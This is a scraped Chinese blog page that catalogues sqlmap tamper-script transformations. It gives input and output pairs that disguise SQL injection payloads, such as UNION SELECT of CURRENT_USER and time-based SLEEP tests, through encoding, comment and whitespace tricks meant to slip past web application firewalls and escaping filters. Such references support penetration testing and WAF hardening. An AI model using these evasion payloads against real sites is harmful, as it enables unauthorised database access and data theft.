Sqlmap Tamper大全
Default
| 1 2 | ("1 AND '1'='1") '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871' | 
Default
| 1 2 | * Input: SELECT * FROM users WHERE id=1 * Output: SELECT * FROM users WHERE id LIKE 1 | 
Default
| 1 2 | ('1 AND 9227=9227') '1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227' | 
Default
| 1 2 | ('1 AND A > B') '1 AND GREATEST(A,B+1)=A' | 
Default
| 1 2 | * Input: 1 AND 9227=9227 * Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227 | 
Default
| 1 2 | tamper("1 AND '1'='1") '1 AND %00%271%00%27=%00%271' | 
Default
| 1 2 | ("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa") "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa" | 
Default
| 1 2 | * Input: 1 AND 9227=9227 * Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227 | 
Default
| 1 2 | ('1 AND 1=1') '1 AND 1=1%00' | 
Default
| 1 2 | ('IFNULL(1, 2)') 'IF(ISNULL(1),2,1)' | 
Default
| 1 2 | * Input: SELECT id FROM users * Output: SELECT%08id%02FROM%0Fusers | 
Default
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 | #   SOH     01      start of heading #   STX     02      start of text #   ETX     03      end of text #   EOT     04      end of transmission #   ENQ     05      enquiry #   ACK     06      acknowledge #   BEL     07      bell #   BS      08      backspace #   TAB     09      horizontal tab #   LF      0A      new line #   VT      0B      vertical TAB #   FF      0C      new page #   CR      0D      carriage return #   SO      0E      shift out #   SI      0F      shift in | 
Default
| 1 2 | ("1' AND SLEEP(5)#") 'MScgQU5EIFNMRUVQKDUpIw==' | 
Default
| 1 2 | ('1 AND 9227=9227') '1%23%0AAND%23%0A9227=9227' | 
Default
| 1 2 | ('1 AND 2>1--') '1 /*!30874AND 2>1*/--' | 
Default
| 1 2 | * Input: SELECT id FROM users * Output: SELECT%0Bid%0BFROM%A0users | 
Default
| 1 2 3 4 5 6 | #   TAB     09      horizontal TAB #   LF      0A      new line #   FF      0C      new page #   CR      0D      carriage return #   VT      0B      vertical TAB        (MySQL and Microsoft SQL Server only) #   -       A0      -                   (MySQL only) | 
Default
| 1 2 | ('1 AND A > B--') '1 AND A NOT BETWEEN 0 AND B--' | 
Default
| 1 2 | ('1 AND 2>1--') '1 /*!00000AND 2>1*/--' | 
Default
| 1 2 | ('1 AND 9227=9227') '1--%0AAND--%0A9227=9227' | 
Default
| 1 2 | ('1 UNION SELECT foobar') '1    UNION     SELECT   foobar' | 
Default
| 1 2 | ('SELECT id FROM users') 'SELECT+id+FROM+users' | 
Default
| 1 2 | ('SELECT id FROM users where id = 1') 'SELECT%09id FROM users where id LIKE 1' | 
Default
| 1 2 | ('1 UNION SELECT 2--') '1 UNIOUNIONN SELESELECTCT 2--' | 
Default
| 1 2 | ('SELECT id FROM users') 'SELECT%0Did%0DFROM%0Ausers' | 
Default
| 1 2 | * Input: SELECT FIELD FROM TABLE * Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E | 
Default
| 1 2 | ('1 AND 9227=9227-- ') '1 AND 9227=9227-- sp_password' | 
Default
| 1 2 | * Input: SELECT FIELD FROM%20TABLE * Output: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545 | 
Default
| 1 2 | ('-1 UNION ALL SELECT') '-1 UNION SELECT' | 
Default
| 1 2 | * Input: SELECT FIELD FROM%20TABLE * Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45 | 
- Useful to bypass very weak web application firewalls that do not url-decode the request before processing it through their ruleset
- The web server will anyway pass the url-decoded version behind,hence it should work against any DBMS
Default
| 1 2 | * Input: INSERT * Output: InsERt | 
Default
| 1 2 | * Input: 1′ AND 1=1 * Output: 1%bf%27 AND 1=1–%20 | 
- Useful for bypassing magic_quotes/addslashes feature
Default
| 1 | ‘INSERT’ becomes ‘IN//S//ERT’ | 
Default
| 1 2 | * Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))# * Output: 1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS**!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))# | 
Default
| 1 2 | * Input: SELECT FIELD%20FROM TABLE * Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′ | 
Requirement:
- Useful to bypass weak web application firewalls that do not unicode url-decode the request before processing it through their ruleset
Default
| 1 2 | ('1 AND 1=1') "1 AND 1=1 and '0having'='0having'" | 
Default
| 1 2 | * Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))# * Output: 1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS**!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))# | 
Default
| 1 2 | * Input: SELECT id FROM users * Output: SELECT//id//FROM/**/users | 
- Useful to bypass weak and bespoke web application firewalls
Default
| 1 2 | * Input: value’ UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND ‘QDWa’='QDWa * Output: value’/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND ‘QDWa’='QDWa | 
Sqlmap Tamper大全的更多相关文章
- Sqlmap Tamper大全(1)
		sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MS-SQL,,MYSQL,ORACLE和POSTGRESQL.SQLMAP采用四 ... 
- SQLMap Tamper Scripts Update 04/July/2016
		SQLMap Tamper Scripts Update apostrophemask.py Replaces apostrophe character with its UTF-8 full wid ... 
- sqlmap tamper脚本
		本文来自:SQLmap tamper脚本注释, 更新了一些脚本,<<不断更新中>> 目前已经总共有50+的脚本,故对源文章进行更新... sqlmap-master ls -l ... 
- 安全工具推荐之sqlmap tamper&sqlmap api
		我发现总有一些人喜欢问sqlmap的tamper脚本,问完工具问参数,问完参数问脚本...... 你这个问题问的水平就很艺术,让我一时不知从何说起...... 说一下在sqlmap的使用过程中,个人了 ... 
- sqlmap Tamper脚本编写
		sqlmap Tamper脚本编写 前言 sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, Postg ... 
- sqlmap参数大全
		-u #注入点-f #指纹判别数据库类型-b #获取数据库版本信息-p #指定可测试的参数(?page=1&id=2 -p “page,id”)-D “”#指定数据库名-T “”#指定表名-C ... 
- sqlmap tamper的使用
		前言 在早之前我对于tamper的使用一直都是停留在错误的思维.想着bypass,应该要先手动fuzz出规则来,然后再写成tamper使用. 直到今天,才察觉根本不需要一定要fuzz出具体的规则来,无 ... 
- sqlmap tamper下模块的使用
		使用方法 根据实际情况,可以同时使用多个脚本,使用-v参数可以看到payload的变化. sqlmap.py -u "http://www.target.com/test.php?id=12 ... 
- sqlmap tamper编写
		#!/usr/bin/env python """ Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.or ... 
随机推荐
- 七 使用list和tuple
			list Python内置的一种数据类型是列表:list.list是一种有序的集合,可以随时添加和删除其中的元素. 比如,列出班里所有同学的名字,就可以用一个list表示: >>> ... 
- openssl 获取证书中的公钥
			PEM 格式 1. FILE *fp = fopen("xx.pem", "r"); 2. X509 *cert = PEM_read_X509(fp, N ... 
- 洛谷P2731 骑马修栅栏 [欧拉回路]
			题目传送门 骑马修栅栏 题目背景 Farmer John每年有很多栅栏要修理.他总是骑着马穿过每一个栅栏并修复它破损的地方. 题目描述 John是一个与其他农民一样懒的人.他讨厌骑马,因此从来不两次经 ... 
- js中箭头函数和普通函数this的区别
			最近在学习angularJs的时候由于里面涉及到了箭头函数,箭头函数除了声明上有点区别以外,和普通函数最主要的区别还是在this的问题上. Js中函数中嵌套的函数this不会 “继承”.比如说以下代码 ... 
- HDU 6199gems gems gems (DP)
			gems gems gems Time Limit: 2000/1000 MS (Java/Others) Memory Limit: 32768/32768 K (Java/Others)To ... 
- hdu 1058 dp.Humble Numbers
			Humble Numbers Time Limit:1000MS Memory Limit:32768KB 64bit IO Format:%I64d & %I64u Subm ... 
- Python 2.7.x 和 3.x 版本的语法区别
			<__future__模块> Python 3.x引入了一些与Python 2不兼容的关键字和特性,在Python 2中,可以通过内置的__future__模块导入这些新内容.如果你希望在 ... 
- 不思议迷宫:逆向后的放置play
			前言 前置准备 目标分析 逆向加密逻辑 定位sign与key 解密luac 反编译luajit的bytecode 开启上帝模式 前言 看了fatezero的<阴阳师:一个非酋的逆向旅程& ... 
- Java高级架构师(一)第43节:Varnish简介、安装和基本使用
			第一部分:Varnish简介 Varnish是一款开源的.高性能的HTTP加速器和反向代理服务器. Varnish反向代理的能力远不如Nginx. Varnish主要作用是HTTP的加速器,主要通过缓 ... 
- Objective-C-类(static)方法、实例方法、overwrite(覆写)、属性(property)复习
			先来定义一个Human父类 定义部分: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 // // Human.h // OOP // // ... 
